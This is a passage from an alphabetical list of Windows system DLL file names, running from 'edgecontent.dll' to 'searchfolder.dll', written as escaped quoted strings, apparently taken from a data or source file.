\"edgecontent.dll\", \"edgehtml.dll\", \"edgeiso.dll\", \"edgemanager.dll\", \"edpauditapi.dll\", \"edpcsp.dll\", \"edptask.dll\", \"edputil.dll\", \"eeprov.dll\", \"eeutil.dll\", \"efsadu.dll\", \"efscore.dll\", \"efsext.dll\", \"efslsaext.dll\", \"efssvc.dll\", \"efsutil.dll\", \"efswrt.dll\", \"ehstorapi.dll\", \"ehstorpwdmgr.dll\", \"ehstorshell.dll\", \"els.dll\", \"elscore.dll\", \"elshyph.dll\", \"elslad.dll\", \"elstrans.dll\", \"emailapis.dll\", \"embeddedmodesvc.dll\", \"emojids.dll\", \"encapi.dll\", \"energy.dll\", \"energyprov.dll\", \"energytask.dll\", \"enrollmentapi.dll\", \"enterpriseapncsp.dll\", \"enterprisecsps.dll\", \"enterpriseetw.dll\", \"eqossnap.dll\", \"errordetails.dll\", \"errordetailscore.dll\", \"es.dll\", \"esclprotocol.dll\", \"esclscan.dll\", \"esclwiadriver.dll\", \"esdsip.dll\", \"esent.dll\", \"esentprf.dll\", \"esevss.dll\", \"eshims.dll\", \"etwrundown.dll\", \"euiccscsp.dll\", \"eventaggregation.dll\", \"eventcls.dll\", \"evr.dll\", \"execmodelclient.dll\", \"execmodelproxy.dll\", \"explorerframe.dll\", \"exsmime.dll\", \"extrasxmlparser.dll\", \"f3ahvoas.dll\", \"facilitator.dll\", \"familysafetyext.dll\", \"faultrep.dll\", \"fcon.dll\", \"fdbth.dll\", \"fdbthproxy.dll\", \"fddevquery.dll\", \"fde.dll\", \"fdeploy.dll\", \"fdphost.dll\", \"fdpnp.dll\", \"fdprint.dll\", \"fdproxy.dll\", \"fdrespub.dll\", \"fdssdp.dll\", \"fdwcn.dll\", \"fdwnet.dll\", \"fdwsd.dll\", \"feclient.dll\", \"ffbroker.dll\", \"fhcat.dll\", \"fhcfg.dll\", \"fhcleanup.dll\", \"fhcpl.dll\", \"fhengine.dll\", \"fhevents.dll\", \"fhshl.dll\", \"fhsrchapi.dll\", \"fhsrchph.dll\", \"fhsvc.dll\", \"fhsvcctl.dll\", \"fhtask.dll\", \"fhuxadapter.dll\", \"fhuxapi.dll\", \"fhuxcommon.dll\", \"fhuxgraphics.dll\", \"fhuxpresentation.dll\", \"fidocredprov.dll\", \"filemgmt.dll\", \"filterds.dll\", \"findnetprinters.dll\", \"firewallapi.dll\", \"flightsettings.dll\", \"fltlib.dll\", \"fluencyds.dll\", \"fmapi.dll\", \"fmifs.dll\", \"fms.dll\", \"fntcache.dll\", \"fontext.dll\", \"fontprovider.dll\", \"fontsub.dll\", \"fphc.dll\", \"framedyn.dll\", \"framedynos.dll\", \"frameserver.dll\", \"frprov.dll\", \"fsutilext.dll\", \"fthsvc.dll\", \"fundisc.dll\", \"fveapi.dll\", \"fveapibase.dll\", \"fvecerts.dll\", \"fvecpl.dll\", \"fveskybackup.dll\", \"fveui.dll\", \"fvewiz.dll\", \"fwbase.dll\", \"fwcfg.dll\", \"fwmdmcsp.dll\", \"fwpolicyiomgr.dll\", \"fwpuclnt.dll\", \"fwremotesvr.dll\", \"gameinput.dll\", \"gamemode.dll\", \"gamestreamingext.dll\", \"gameux.dll\", \"gamingtcui.dll\", \"gcdef.dll\", \"gdi32.dll\", \"gdi32full.dll\", \"gdiplus.dll\", \"generaltel.dll\", \"geocommon.dll\", \"geolocation.dll\", \"getuname.dll\", \"glmf32.dll\", \"globinputhost.dll\", \"glu32.dll\", \"gmsaclient.dll\", \"gpapi.dll\", \"gpcsewrappercsp.dll\", \"gpedit.dll\", \"gpprefcl.dll\", \"gpprnext.dll\", \"gpscript.dll\", \"gpsvc.dll\", \"gptext.dll\", \"graphicscapture.dll\", \"graphicsperfsvc.dll\", \"groupinghc.dll\", \"hal.dll\", \"halextpl080.dll\", \"hascsp.dll\", \"hashtagds.dll\", \"hbaapi.dll\", \"hcproviders.dll\", \"hdcphandler.dll\", \"heatcore.dll\", \"helppaneproxy.dll\", \"hgcpl.dll\", \"hhsetup.dll\", \"hid.dll\", \"hidcfu.dll\", \"hidserv.dll\", \"hlink.dll\", \"hmkd.dll\", \"hnetcfg.dll\", \"hnetcfgclient.dll\", \"hnetmon.dll\", \"hologramworld.dll\", \"holoshellruntime.dll\", \"holoshextensions.dll\", \"hotplug.dll\", \"hrtfapo.dll\", \"httpapi.dll\", \"httpprxc.dll\", \"httpprxm.dll\", \"httpprxp.dll\", \"httpsdatasource.dll\", \"htui.dll\", \"hvhostsvc.dll\", \"hvloader.dll\", \"hvsigpext.dll\", \"hvsocket.dll\", \"hydrogen.dll\", \"ia2comproxy.dll\", \"ias.dll\", \"iasacct.dll\", \"iasads.dll\", \"iasdatastore.dll\", \"iashlpr.dll\", \"iasmigplugin.dll\", \"iasnap.dll\", \"iaspolcy.dll\", \"iasrad.dll\", \"iasrecst.dll\", \"iassam.dll\", \"iassdo.dll\", \"iassvcs.dll\", \"icfupgd.dll\", \"icm32.dll\", \"icmp.dll\", \"icmui.dll\", \"iconcodecservice.dll\", \"icsigd.dll\", \"icsvc.dll\", \"icsvcext.dll\", \"icu.dll\", \"icuin.dll\", \"icuuc.dll\", \"idctrls.dll\", \"idlisten.dll\", \"idndl.dll\", \"idstore.dll\", \"ieadvpack.dll\", \"ieapfltr.dll\", \"iedkcs32.dll\", \"ieframe.dll\", \"iemigplugin.dll\", \"iepeers.dll\", \"ieproxy.dll\", \"iernonce.dll\", \"iertutil.dll\", \"iesetup.dll\", \"iesysprep.dll\", \"ieui.dll\", \"ifmon.dll\", \"ifsutil.dll\", \"ifsutilx.dll\", \"igddiag.dll\", \"ihds.dll\", \"ikeext.dll\", \"imagehlp.dll\", \"imageres.dll\", \"imagesp1.dll\", \"imapi.dll\", \"imapi2.dll\", \"imapi2fs.dll\", \"imgutil.dll\", \"imm32.dll\", \"implatsetup.dll\", \"indexeddblegacy.dll\", \"inetcomm.dll\", \"inetmib1.dll\", \"inetpp.dll\", \"inetppui.dll\", \"inetres.dll\", \"inked.dll\", \"inkobjcore.dll\", \"inproclogger.dll\", \"input.dll\", \"inputcloudstore.dll\", \"inputcontroller.dll\", \"inputhost.dll\", \"inputservice.dll\", \"inputswitch.dll\", \"inseng.dll\", \"installservice.dll\", \"internetmail.dll\", \"internetmailcsp.dll\", \"invagent.dll\", \"iologmsg.dll\", \"iphlpapi.dll\", \"iphlpsvc.dll\", \"ipnathlp.dll\", \"ipnathlpclient.dll\", \"ippcommon.dll\", \"ippcommonproxy.dll\", \"iprtprio.dll\", \"iprtrmgr.dll\", \"ipsecsnp.dll\", \"ipsecsvc.dll\", \"ipsmsnap.dll\", \"ipxlatcfg.dll\", \"iri.dll\", \"iscsicpl.dll\", \"iscsidsc.dll\", \"iscsied.dll\", \"iscsiexe.dll\", \"iscsilog.dll\", \"iscsium.dll\", \"iscsiwmi.dll\", \"iscsiwmiv2.dll\", \"ism.dll\", \"itircl.dll\", \"itss.dll\", \"iuilp.dll\", \"iumbase.dll\", \"iumcrypt.dll\", \"iumdll.dll\", \"iumsdk.dll\", \"iyuv_32.dll\", \"joinproviderol.dll\", \"joinutil.dll\", \"jpmapcontrol.dll\", \"jpndecoder.dll\", \"jpninputrouter.dll\", \"jpnranker.dll\", \"jpnserviceds.dll\", \"jscript.dll\", \"jscript9.dll\", \"jscript9diag.dll\", \"jsproxy.dll\", \"kbd101.dll\", \"kbd101a.dll\", \"kbd101b.dll\", \"kbd101c.dll\", \"kbd103.dll\", \"kbd106.dll\", \"kbd106n.dll\", \"kbda1.dll\", \"kbda2.dll\", \"kbda3.dll\", \"kbdadlm.dll\", \"kbdal.dll\", \"kbdarme.dll\", \"kbdarmph.dll\", \"kbdarmty.dll\", \"kbdarmw.dll\", \"kbdax2.dll\", \"kbdaze.dll\", \"kbdazel.dll\", \"kbdazst.dll\", \"kbdbash.dll\", \"kbdbe.dll\", \"kbdbene.dll\", \"kbdbgph.dll\", \"kbdbgph1.dll\", \"kbdbhc.dll\", \"kbdblr.dll\", \"kbdbr.dll\", \"kbdbu.dll\", \"kbdbug.dll\", \"kbdbulg.dll\", \"kbdca.dll\", \"kbdcan.dll\", \"kbdcher.dll\", \"kbdcherp.dll\", \"kbdcr.dll\", \"kbdcz.dll\", \"kbdcz1.dll\", \"kbdcz2.dll\", \"kbdda.dll\", \"kbddiv1.dll\", \"kbddiv2.dll\", \"kbddv.dll\", \"kbddzo.dll\", \"kbdes.dll\", \"kbdest.dll\", \"kbdfa.dll\", \"kbdfar.dll\", \"kbdfc.dll\", \"kbdfi.dll\", \"kbdfi1.dll\", \"kbdfo.dll\", \"kbdfr.dll\", \"kbdfthrk.dll\", \"kbdgae.dll\", \"kbdgeo.dll\", \"kbdgeoer.dll\", \"kbdgeome.dll\", \"kbdgeooa.dll\", \"kbdgeoqw.dll\", \"kbdgkl.dll\", \"kbdgn.dll\", \"kbdgr.dll\", \"kbdgr1.dll\", \"kbdgrlnd.dll\", \"kbdgthc.dll\", \"kbdhau.dll\", \"kbdhaw.dll\", \"kbdhe.dll\", \"kbdhe220.dll\", \"kbdhe319.dll\", \"kbdheb.dll\", \"kbdhebl3.dll\", \"kbdhela2.dll\", \"kbdhela3.dll\", \"kbdhept.dll\", \"kbdhu.dll\", \"kbdhu1.dll\", \"kbdibm02.dll\", \"kbdibo.dll\", \"kbdic.dll\", \"kbdinasa.dll\", \"kbdinbe1.dll\", \"kbdinbe2.dll\", \"kbdinben.dll\", \"kbdindev.dll\", \"kbdinen.dll\", \"kbdinguj.dll\", \"kbdinhin.dll\", \"kbdinkan.dll\", \"kbdinmal.dll\", \"kbdinmar.dll\", \"kbdinori.dll\", \"kbdinpun.dll\", \"kbdintam.dll\", \"kbdintel.dll\", \"kbdinuk2.dll\", \"kbdir.dll\", \"kbdit.dll\", \"kbdit142.dll\", \"kbdiulat.dll\", \"kbdjav.dll\", \"kbdjpn.dll\", \"kbdkaz.dll\", \"kbdkhmr.dll\", \"kbdkni.dll\", \"kbdkor.dll\", \"kbdkurd.dll\", \"kbdkyr.dll\", \"kbdla.dll\", \"kbdlao.dll\", \"kbdlisub.dll\", \"kbdlisus.dll\", \"kbdlk41a.dll\", \"kbdlt.dll\", \"kbdlt1.dll\", \"kbdlt2.dll\", \"kbdlv.dll\", \"kbdlv1.dll\", \"kbdlvst.dll\", \"kbdmac.dll\", \"kbdmacst.dll\", \"kbdmaori.dll\", \"kbdmlt47.dll\", \"kbdmlt48.dll\", \"kbdmon.dll\", \"kbdmonmo.dll\", \"kbdmonst.dll\", \"kbdmyan.dll\", \"kbdne.dll\", \"kbdnec.dll\", \"kbdnec95.dll\", \"kbdnecat.dll\", \"kbdnecnt.dll\", \"kbdnepr.dll\", \"kbdnko.dll\", \"kbdno.dll\", \"kbdno1.dll\", \"kbdnso.dll\", \"kbdntl.dll\", \"kbdogham.dll\", \"kbdolch.dll\", \"kbdoldit.dll\", \"kbdosa.dll\", \"kbdosm.dll\", \"kbdpash.dll\", \"kbdphags.dll\", \"kbdpl.dll\", \"kbdpl1.dll\", \"kbdpo.dll\", \"kbdro.dll\", \"kbdropr.dll\", \"kbdrost.dll\", \"kbdru.dll\", \"kbdru1.dll\", \"kbdrum.dll\", \"kbdsf.dll\", \"kbdsg.dll\", \"kbdsl.dll\", \"kbdsl1.dll\", \"kbdsmsfi.dll\", \"kbdsmsno.dll\", \"kbdsn1.dll\", \"kbdsora.dll\", \"kbdsorex.dll\", \"kbdsors1.dll\", \"kbdsorst.dll\", \"kbdsp.dll\", \"kbdsw.dll\", \"kbdsw09.dll\", \"kbdsyr1.dll\", \"kbdsyr2.dll\", \"kbdtaile.dll\", \"kbdtajik.dll\", \"kbdtam99.dll\", \"kbdtat.dll\", \"kbdth0.dll\", \"kbdth1.dll\", \"kbdth2.dll\", \"kbdth3.dll\", \"kbdtifi.dll\", \"kbdtifi2.dll\", \"kbdtiprc.dll\", \"kbdtiprd.dll\", \"kbdtt102.dll\", \"kbdtuf.dll\", \"kbdtuq.dll\", \"kbdturme.dll\", \"kbdtzm.dll\", \"kbdughr.dll\", \"kbdughr1.dll\", \"kbduk.dll\", \"kbdukx.dll\", \"kbdur.dll\", \"kbdur1.dll\", \"kbdurdu.dll\", \"kbdus.dll\", \"kbdusa.dll\", \"kbdusl.dll\", \"kbdusr.dll\", \"kbdusx.dll\", \"kbduzb.dll\", \"kbdvntc.dll\", \"kbdwol.dll\", \"kbdyak.dll\", \"kbdyba.dll\", \"kbdycc.dll\", \"kbdycl.dll\", \"kd.dll\", \"kdcom.dll\", \"kdcpw.dll\", \"kdhvcom.dll\", \"kdnet.dll\", \"kdnet_uart16550.dll\", \"kdscli.dll\", \"kdstub.dll\", \"kdusb.dll\", \"kd_02_10df.dll\", \"kd_02_10ec.dll\", \"kd_02_1137.dll\", \"kd_02_14e4.dll\", \"kd_02_15b3.dll\", \"kd_02_1969.dll\", \"kd_02_19a2.dll\", \"kd_02_1af4.dll\", \"kd_02_8086.dll\", \"kd_07_1415.dll\", \"kd_0c_8086.dll\", \"kerbclientshared.dll\", \"kerberos.dll\", \"kernel32.dll\", \"kernelbase.dll\", \"keycredmgr.dll\", \"keyiso.dll\", \"keymgr.dll\", \"knobscore.dll\", \"knobscsp.dll\", \"ksuser.dll\", \"ktmw32.dll\", \"l2gpstore.dll\", \"l2nacp.dll\", \"l2sechc.dll\", \"laprxy.dll\", \"legacynetux.dll\", \"lfsvc.dll\", \"libcrypto.dll\", \"licensemanager.dll\", \"licensingcsp.dll\", \"licensingdiagspp.dll\", \"licensingwinrt.dll\", \"licmgr10.dll\", \"linkinfo.dll\", \"lltdapi.dll\", \"lltdres.dll\", \"lltdsvc.dll\", \"lmhsvc.dll\", \"loadperf.dll\", \"localsec.dll\", \"localspl.dll\", \"localui.dll\", \"locationapi.dll\", \"lockappbroker.dll\", \"lockcontroller.dll\", \"lockscreendata.dll\", \"loghours.dll\", \"logoncli.dll\", \"logoncontroller.dll\", \"lpasvc.dll\", \"lpk.dll\", \"lsasrv.dll\", \"lscshostpolicy.dll\", \"lsm.dll\", \"lsmproxy.dll\", \"lstelemetry.dll\", \"luainstall.dll\", \"luiapi.dll\", \"lz32.dll\", \"magnification.dll\", \"maintenanceui.dll\", \"manageci.dll\", \"mapconfiguration.dll\", \"mapcontrolcore.dll\", \"mapgeocoder.dll\", \"mapi32.dll\", \"mapistub.dll\", \"maprouter.dll\", \"mapsbtsvc.dll\", \"mapsbtsvcproxy.dll\", \"mapscsp.dll\", \"mapsstore.dll\", \"mapstoasttask.dll\", \"mapsupdatetask.dll\", \"mbaeapi.dll\", \"mbaeapipublic.dll\", \"mbaexmlparser.dll\", \"mbmediamanager.dll\", \"mbsmsapi.dll\", \"mbussdapi.dll\", \"mccsengineshared.dll\", \"mccspal.dll\", \"mciavi32.dll\", \"mcicda.dll\", \"mciqtz32.dll\", \"mciseq.dll\", \"mciwave.dll\", \"mcrecvsrc.dll\", \"mdmcommon.dll\", \"mdmdiagnostics.dll\", \"mdminst.dll\", \"mdmmigrator.dll\", \"mdmregistration.dll\", \"memorydiagnostic.dll\", \"messagingservice.dll\", \"mf.dll\", \"mf3216.dll\", \"mfaacenc.dll\", \"mfasfsrcsnk.dll\", \"mfaudiocnv.dll\", \"mfc42.dll\", \"mfc42u.dll\", \"mfcaptureengine.dll\", \"mfcore.dll\", \"mfcsubs.dll\", \"mfds.dll\", \"mfdvdec.dll\", \"mferror.dll\", \"mfh263enc.dll\", \"mfh264enc.dll\", \"mfksproxy.dll\", \"mfmediaengine.dll\", \"mfmjpegdec.dll\", \"mfmkvsrcsnk.dll\", \"mfmp4srcsnk.dll\", \"mfmpeg2srcsnk.dll\", \"mfnetcore.dll\", \"mfnetsrc.dll\", \"mfperfhelper.dll\", \"mfplat.dll\", \"mfplay.dll\", \"mfps.dll\", \"mfreadwrite.dll\", \"mfsensorgroup.dll\", \"mfsrcsnk.dll\", \"mfsvr.dll\", \"mftranscode.dll\", \"mfvdsp.dll\", \"mfvfw.dll\", \"mfwmaaec.dll\", \"mgmtapi.dll\", \"mi.dll\", \"mibincodec.dll\", \"midimap.dll\", \"migisol.dll\", \"miguiresource.dll\", \"mimefilt.dll\", \"mimofcodec.dll\", \"minstoreevents.dll\", \"miracastinputmgr.dll\", \"miracastreceiver.dll\", \"mirrordrvcompat.dll\", \"mispace.dll\", \"mitigationclient.dll\", \"miutils.dll\", \"mlang.dll\", \"mmcbase.dll\", \"mmcndmgr.dll\", \"mmcshext.dll\", \"mmdevapi.dll\", \"mmgaclient.dll\", \"mmgaproxystub.dll\", \"mmres.dll\", \"mobilenetworking.dll\", \"modemui.dll\", \"modernexecserver.dll\", \"moricons.dll\", \"moshost.dll\", \"moshostclient.dll\", \"moshostcore.dll\", \"mosstorage.dll\", \"mp3dmod.dll\", \"mp43decd.dll\", \"mp4sdecd.dll\", \"mpeval.dll\", \"mpg4decd.dll\", \"mpr.dll\", \"mprapi.dll\", \"mprddm.dll\", \"mprdim.dll\", \"mprext.dll\", \"mprmsg.dll\", \"mpssvc.dll\", \"mpunits.dll\", \"mrmcorer.dll\", \"mrmdeploy.dll\", \"mrmindexer.dll\", \"mrt100.dll\", \"mrt_map.dll\", \"msaatext.dll\", \"msac3enc.dll\", \"msacm32.dll\", \"msafd.dll\", \"msajapi.dll\", \"msalacdecoder.dll\", \"msalacencoder.dll\", \"msamrnbdecoder.dll\", \"msamrnbencoder.dll\", \"msamrnbsink.dll\", \"msamrnbsource.dll\", \"msasn1.dll\", \"msauddecmft.dll\", \"msaudite.dll\", \"msauserext.dll\", \"mscandui.dll\", \"mscat32.dll\", \"msclmd.dll\", \"mscms.dll\", \"mscoree.dll\", \"mscorier.dll\", \"mscories.dll\", \"msctf.dll\", \"msctfmonitor.dll\", \"msctfp.dll\", \"msctfui.dll\", \"msctfuimanager.dll\", \"msdadiag.dll\", \"msdart.dll\", \"msdelta.dll\", \"msdmo.dll\", \"msdrm.dll\", \"msdtckrm.dll\", \"msdtclog.dll\", \"msdtcprx.dll\", \"msdtcspoffln.dll\", \"msdtctm.dll\", \"msdtcuiu.dll\", \"msdtcvsp1res.dll\", \"msfeeds.dll\", \"msfeedsbs.dll\", \"msflacdecoder.dll\", \"msflacencoder.dll\", \"msftedit.dll\", \"msheif.dll\", \"mshtml.dll\", \"mshtmldac.dll\", \"mshtmled.dll\", \"mshtmler.dll\", \"msi.dll\", \"msicofire.dll\", \"msidcrl40.dll\", \"msident.dll\", \"msidle.dll\", \"msidntld.dll\", \"msieftp.dll\", \"msihnd.dll\", \"msiltcfg.dll\", \"msimg32.dll\", \"msimsg.dll\", \"msimtf.dll\", \"msisip.dll\", \"msiso.dll\", \"msiwer.dll\", \"mskeyprotcli.dll\", \"mskeyprotect.dll\", \"msls31.dll\", \"msmpeg2adec.dll\", \"msmpeg2enc.dll\", \"msmpeg2vdec.dll\", \"msobjs.dll\", \"msoert2.dll\", \"msopusdecoder.dll\", \"mspatcha.dll\", \"mspatchc.dll\", \"msphotography.dll\", \"msports.dll\", \"msprivs.dll\", \"msrahc.dll\", \"msrating.dll\", \"msrawimage.dll\", \"msrdc.dll\", \"msrdpwebaccess.dll\", \"msrle32.dll\", \"msscntrs.dll\", \"mssecuser.dll\", \"mssign32.dll\", \"mssip32.dll\", \"mssitlb.dll\", \"mssph.dll\", \"mssprxy.dll\", \"mssrch.dll\", \"mssvp.dll\", \"mstask.dll\", \"mstextprediction.dll\", \"mstscax.dll\", \"msutb.dll\", \"msv1_0.dll\", \"msvcirt.dll\", \"msvcp110_win.dll\", \"msvcp120_clr0400.dll\", \"msvcp140_clr0400.dll\", \"msvcp60.dll\", \"msvcp_win.dll\", \"msvcr100_clr0400.dll\", \"msvcr120_clr0400.dll\", \"msvcrt.dll\", \"msvfw32.dll\", \"msvidc32.dll\", \"msvidctl.dll\", \"msvideodsp.dll\", \"msvp9dec.dll\", \"msvproc.dll\", \"msvpxenc.dll\", \"mswb7.dll\", \"mswebp.dll\", \"mswmdm.dll\", \"mswsock.dll\", \"msxml3.dll\", \"msxml3r.dll\", \"msxml6.dll\", \"msxml6r.dll\", \"msyuv.dll\", \"mtcmodel.dll\", \"mtf.dll\", \"mtfappserviceds.dll\", \"mtfdecoder.dll\", \"mtffuzzyds.dll\", \"mtfserver.dll\", \"mtfspellcheckds.dll\", \"mtxclu.dll\", \"mtxdm.dll\", \"mtxex.dll\", \"mtxoci.dll\", \"muifontsetup.dll\", \"mycomput.dll\", \"mydocs.dll\", \"napcrypt.dll\", \"napinsp.dll\", \"naturalauth.dll\", \"naturallanguage6.dll\", \"navshutdown.dll\", \"ncaapi.dll\", \"ncasvc.dll\", \"ncbservice.dll\", \"ncdautosetup.dll\", \"ncdprop.dll\", \"nci.dll\", \"ncobjapi.dll\", \"ncrypt.dll\", \"ncryptprov.dll\", \"ncryptsslp.dll\", \"ncsi.dll\", \"ncuprov.dll\", \"nddeapi.dll\", \"ndfapi.dll\", \"ndfetw.dll\", \"ndfhcdiscovery.dll\", \"ndishc.dll\", \"ndproxystub.dll\", \"nduprov.dll\", \"negoexts.dll\", \"netapi32.dll\", \"netbios.dll\", \"netcenter.dll\", \"netcfgx.dll\", \"netcorehc.dll\", \"netdiagfx.dll\", \"netdriverinstall.dll\", \"netevent.dll\", \"netfxperf.dll\", \"neth.dll\", \"netid.dll\", \"netiohlp.dll\", \"netjoin.dll\", \"netlogon.dll\", \"netman.dll\", \"netmsg.dll\", \"netplwiz.dll\", \"netprofm.dll\", \"netprofmsvc.dll\", \"netprovfw.dll\", \"netprovisionsp.dll\", \"netsetupapi.dll\", \"netsetupengine.dll\", \"netsetupshim.dll\", \"netsetupsvc.dll\", \"netshell.dll\", \"nettrace.dll\", \"netutils.dll\", \"networkexplorer.dll\", \"networkhelper.dll\", \"networkicon.dll\", \"networkproxycsp.dll\", \"networkstatus.dll\", \"networkuxbroker.dll\", \"newdev.dll\", \"nfcradiomedia.dll\", \"ngccredprov.dll\", \"ngcctnr.dll\", \"ngcctnrsvc.dll\", \"ngcisoctnr.dll\", \"ngckeyenum.dll\", \"ngcksp.dll\", \"ngclocal.dll\", \"ngcpopkeysrv.dll\", \"ngcprocsp.dll\", \"ngcrecovery.dll\", \"ngcsvc.dll\", \"ngctasks.dll\", \"ninput.dll\", \"nlaapi.dll\", \"nlahc.dll\", \"nlasvc.dll\", \"nlhtml.dll\", \"nlmgp.dll\", \"nlmproxy.dll\", \"nlmsprep.dll\", \"nlsbres.dll\", \"nlsdata0000.dll\", \"nlsdata0009.dll\", \"nlsdl.dll\", \"nlslexicons0009.dll\", \"nmadirect.dll\", \"normaliz.dll\", \"npmproxy.dll\", \"npsm.dll\", \"nrpsrv.dll\", \"nshhttp.dll\", \"nshipsec.dll\", \"nshwfp.dll\", \"nsi.dll\", \"nsisvc.dll\", \"ntasn1.dll\", \"ntdll.dll\", \"ntdsapi.dll\", \"ntlanman.dll\", \"ntlanui2.dll\", \"ntlmshared.dll\", \"ntmarta.dll\", \"ntprint.dll\", \"ntshrui.dll\", \"ntvdm64.dll\", \"objsel.dll\", \"occache.dll\", \"ocsetapi.dll\", \"odbc32.dll\", \"odbcbcp.dll\", \"odbcconf.dll\", \"odbccp32.dll\", \"odbccr32.dll\", \"odbccu32.dll\", \"odbcint.dll\", \"odbctrac.dll\", \"oemlicense.dll\", \"offfilt.dll\", \"officecsp.dll\", \"offlinelsa.dll\", \"offlinesam.dll\", \"offreg.dll\", \"ole32.dll\", \"oleacc.dll\", \"oleacchooks.dll\", \"oleaccrc.dll\", \"oleaut32.dll\", \"oledlg.dll\", \"oleprn.dll\", \"omadmagent.dll\", \"omadmapi.dll\", \"onebackuphandler.dll\", \"onex.dll\", \"onexui.dll\", \"opcservices.dll\", \"opengl32.dll\", \"ortcengine.dll\", \"osbaseln.dll\", \"osksupport.dll\", \"osuninst.dll\", \"p2p.dll\", \"p2pgraph.dll\", \"p2pnetsh.dll\", \"p2psvc.dll\", \"packager.dll\", \"panmap.dll\", \"pautoenr.dll\", \"pcacli.dll\", \"pcadm.dll\", \"pcaevts.dll\", \"pcasvc.dll\", \"pcaui.dll\", \"pcpksp.dll\", \"pcsvdevice.dll\", \"pcwum.dll\", \"pcwutl.dll\", \"pdh.dll\", \"pdhui.dll\", \"peerdist.dll\", \"peerdistad.dll\", \"peerdistcleaner.dll\", \"peerdistsh.dll\", \"peerdistsvc.dll\", \"peopleapis.dll\", \"peopleband.dll\", \"perceptiondevice.dll\", \"perfctrs.dll\", \"perfdisk.dll\", \"perfnet.dll\", \"perfos.dll\", \"perfproc.dll\", \"perfts.dll\", \"phoneom.dll\", \"phoneproviders.dll\", \"phoneservice.dll\", \"phoneserviceres.dll\", \"phoneutil.dll\", \"phoneutilres.dll\", \"photowiz.dll\", \"pickerplatform.dll\", \"pid.dll\", \"pidgenx.dll\", \"pifmgr.dll\", \"pimstore.dll\", \"pkeyhelper.dll\", \"pktmonapi.dll\", \"pku2u.dll\", \"pla.dll\", \"playlistfolder.dll\", \"playsndsrv.dll\", \"playtodevice.dll\", \"playtomanager.dll\", \"playtomenu.dll\", \"playtoreceiver.dll\", \"ploptin.dll\", \"pmcsnap.dll\", \"pngfilt.dll\", \"pnidui.dll\", \"pnpclean.dll\", \"pnppolicy.dll\", \"pnpts.dll\", \"pnpui.dll\", \"pnpxassoc.dll\", \"pnpxassocprx.dll\", \"pnrpauto.dll\", \"pnrphc.dll\", \"pnrpnsp.dll\", \"pnrpsvc.dll\", \"policymanager.dll\", \"polstore.dll\", \"posetup.dll\", \"posyncservices.dll\", \"pots.dll\", \"powercpl.dll\", \"powrprof.dll\", \"ppcsnap.dll\", \"prauthproviders.dll\", \"prflbmsg.dll\", \"printui.dll\", \"printwsdahost.dll\", \"prm0009.dll\", \"prncache.dll\", \"prnfldr.dll\", \"prnntfy.dll\", \"prntvpt.dll\", \"profapi.dll\", \"profext.dll\", \"profprov.dll\", \"profsvc.dll\", \"profsvcext.dll\", \"propsys.dll\", \"provcore.dll\", \"provdatastore.dll\", \"provdiagnostics.dll\", \"provengine.dll\", \"provhandlers.dll\", \"provisioningcsp.dll\", \"provmigrate.dll\", \"provops.dll\", \"provplugineng.dll\", \"provsysprep.dll\", \"provthrd.dll\", \"proximitycommon.dll\", \"proximityservice.dll\", \"prvdmofcomp.dll\", \"psapi.dll\", \"pshed.dll\", \"psisdecd.dll\", \"psmsrv.dll\", \"pstask.dll\", \"pstorec.dll\", \"ptpprov.dll\", \"puiapi.dll\", \"puiobj.dll\", \"pushtoinstall.dll\", \"pwlauncher.dll\", \"pwrshplugin.dll\", \"pwsso.dll\", \"qasf.dll\", \"qcap.dll\", \"qdv.dll\", \"qdvd.dll\", \"qedit.dll\", \"qedwipes.dll\", \"qmgr.dll\", \"query.dll\", \"quiethours.dll\", \"qwave.dll\", \"racengn.dll\", \"racpldlg.dll\", \"radardt.dll\", \"radarrs.dll\", \"radcui.dll\", \"rasadhlp.dll\", \"rasapi32.dll\", \"rasauto.dll\", \"raschap.dll\", \"raschapext.dll\", \"rasctrs.dll\", \"rascustom.dll\", \"rasdiag.dll\", \"rasdlg.dll\", \"rasgcw.dll\", \"rasman.dll\", \"rasmans.dll\", \"rasmbmgr.dll\", \"rasmediamanager.dll\", \"rasmm.dll\", \"rasmontr.dll\", \"rasplap.dll\", \"rasppp.dll\", \"rastapi.dll\", \"rastls.dll\", \"rastlsext.dll\", \"rdbui.dll\", \"rdpbase.dll\", \"rdpcfgex.dll\", \"rdpcore.dll\", \"rdpcorets.dll\", \"rdpencom.dll\", \"rdpendp.dll\", \"rdpnano.dll\", \"rdpsaps.dll\", \"rdpserverbase.dll\", \"rdpsharercom.dll\", \"rdpudd.dll\", \"rdpviewerax.dll\", \"rdsappxhelper.dll\", \"rdsdwmdr.dll\", \"rdvvmtransport.dll\", \"rdxservice.dll\", \"rdxtaskfactory.dll\", \"reagent.dll\", \"reagenttask.dll\", \"recovery.dll\", \"regapi.dll\", \"regctrl.dll\", \"regidle.dll\", \"regsvc.dll\", \"reguwpapi.dll\", \"reinfo.dll\", \"remotepg.dll\", \"remotewipecsp.dll\", \"reportingcsp.dll\", \"resampledmo.dll\", \"resbparser.dll\", \"reseteng.dll\", \"resetengine.dll\", \"resetengonline.dll\", \"resourcemapper.dll\", \"resutils.dll\", \"rgb9rast.dll\", \"riched20.dll\", \"riched32.dll\", \"rjvmdmconfig.dll\", \"rmapi.dll\", \"rmclient.dll\", \"rnr20.dll\", \"roamingsecurity.dll\", \"rometadata.dll\", \"rotmgr.dll\", \"rpcepmap.dll\", \"rpchttp.dll\", \"rpcns4.dll\", \"rpcnsh.dll\", \"rpcrt4.dll\", \"rpcrtremote.dll\", \"rpcss.dll\", \"rsaenh.dll\", \"rshx32.dll\", \"rstrtmgr.dll\", \"rtffilt.dll\", \"rtm.dll\", \"rtmediaframe.dll\", \"rtmmvrortc.dll\", \"rtutils.dll\", \"rtworkq.dll\", \"rulebasedds.dll\", \"samcli.dll\", \"samlib.dll\", \"samsrv.dll\", \"sas.dll\", \"sbe.dll\", \"sbeio.dll\", \"sberes.dll\", \"sbservicetrigger.dll\", \"scansetting.dll\", \"scardbi.dll\", \"scarddlg.dll\", \"scardsvr.dll\", \"scavengeui.dll\", \"scdeviceenum.dll\", \"scecli.dll\", \"scesrv.dll\", \"schannel.dll\", \"schedcli.dll\", \"schedsvc.dll\", \"scksp.dll\", \"scripto.dll\", \"scrobj.dll\", \"scrptadm.dll\", \"scrrun.dll\", \"sdcpl.dll\", \"sdds.dll\", \"sdengin2.dll\", \"sdfhost.dll\", \"sdhcinst.dll\", \"sdiageng.dll\", \"sdiagprv.dll\", \"sdiagschd.dll\", \"sdohlp.dll\", \"sdrsvc.dll\", \"sdshext.dll\", \"searchfolder.dll\", 